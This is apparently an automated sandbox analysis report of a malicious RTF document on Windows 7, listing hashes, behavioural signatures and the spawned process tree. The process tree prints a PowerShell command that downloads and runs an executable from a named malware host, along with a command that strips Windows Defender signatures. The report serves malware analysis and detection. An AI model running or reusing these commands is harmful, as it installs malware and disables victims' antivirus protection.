Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
10-08-2024 12:54
Static task
static1
Behavioral task
behavioral1
Sample
86210e53ed1942ad6dac5bb9c0844290_JaffaCakes118.rtf
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
86210e53ed1942ad6dac5bb9c0844290_JaffaCakes118.rtf
Resource
win10v2004-20240802-en
General
-
Target
86210e53ed1942ad6dac5bb9c0844290_JaffaCakes118.rtf
-
Size
476KB
-
MD5
86210e53ed1942ad6dac5bb9c0844290
-
SHA1
b93bed2e799817d49eeeb2cb09099f0c17b233a4
-
SHA256
24346ebead2ec6ea37b27c0939902b570698a2455170ba7ca2d0e9f3c9dac785
-
SHA512
5e5febc24e9d49ab7c9bf12e0f8dfbb2c8212ec9a6ddc57fc9652cad1dd25eb40558c7fc90c4b5983e4ee996542aa348a4914bcea74feee064f6719e99fb33cc
-
SSDEEP
6144:u5ES9BYFDVp5ES9BYFDWH5ES9BYFDrA5ES9BYFDcc5ES9BYFDZA5ES9V:LmBmQm6mFmkmV
Malware Config
Extracted
http://lokipanelhostingpanel.gq/work/worknew/16.exe
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2640 2984 powershell.exe 31 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 548 2984 cmd.exe 31 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2784 2984 powershell.exe 31 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2608 2984 cmd.exe 31 -
pid Process 2640 powershell.exe 2640 powershell.exe 2784 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Kills process with taskkill 2 IoCs
pid Process 2648 taskkill.exe 2384 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2536 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2640 powershell.exe 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 2384 taskkill.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2536 WINWORD.EXE 2536 WINWORD.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2536 wrote to memory of 2328 2536 WINWORD.EXE 30 PID 2536 wrote to memory of 2328 2536 WINWORD.EXE 30 PID 2536 wrote to memory of 2328 2536 WINWORD.EXE 30 PID 2536 wrote to memory of 2328 2536 WINWORD.EXE 30 PID 2984 wrote to memory of 2640 2984 EXCEL.EXE 32 PID 2984 wrote to memory of 2640 2984 EXCEL.EXE 32 PID 2984 wrote to memory of 2640 2984 EXCEL.EXE 32 PID 2984 wrote to memory of 2640 2984 EXCEL.EXE 32 PID 2984 wrote to memory of 548 2984 EXCEL.EXE 34 PID 2984 wrote to memory of 548 2984 EXCEL.EXE 34 PID 2984 wrote to memory of 548 2984 EXCEL.EXE 34 PID 2984 wrote to memory of 548 2984 EXCEL.EXE 34 PID 2984 wrote to memory of 2784 2984 EXCEL.EXE 36 PID 2984 wrote to memory of 2784 2984 EXCEL.EXE 36 PID 2984 wrote to memory of 2784 2984 EXCEL.EXE 36 PID 2984 wrote to memory of 2784 2984 EXCEL.EXE 36 PID 2984 wrote to memory of 2608 2984 EXCEL.EXE 38 PID 2984 wrote to memory of 2608 2984 EXCEL.EXE 38 PID 2984 wrote to memory of 2608 2984 EXCEL.EXE 38 PID 2984 wrote to memory of 2608 2984 EXCEL.EXE 38 PID 548 wrote to memory of 2648 548 cmd.exe 40 PID 548 wrote to memory of 2648 548 cmd.exe 40 PID 548 wrote to memory of 2648 548 cmd.exe 40 PID 548 wrote to memory of 2648 548 cmd.exe 40 PID 2784 wrote to memory of 2384 2784 powershell.exe 42 PID 2784 wrote to memory of 2384 2784 powershell.exe 42 PID 2784 wrote to memory of 2384 2784 powershell.exe 42 PID 2784 wrote to memory of 2384 2784 powershell.exe 42
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\86210e53ed1942ad6dac5bb9c0844290_JaffaCakes118.rtf"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2328
-
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://lokipanelhostingpanel.gq/work/worknew/16.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & exit2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden taskkill /f /im Excel.exe2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im Excel.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
PID:2608
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5e8c24e5fabd4ff50e0549238ee806e33
SHA1ff4874a474056a14cc4fbb383b9a61fa7f1781d5
SHA2569cc9bc3bf508935423f36d1cb6bc8e89be00a5d53a6cc32581c5567d14261642
SHA5122aad1b5d2dded7e2d6eb39398a81feb32c2b655270c15b57d85ba220b0cca5299b48d7309cd07b3cc12f44be948d9e6016b0db81109d9705be6913b2b48898ec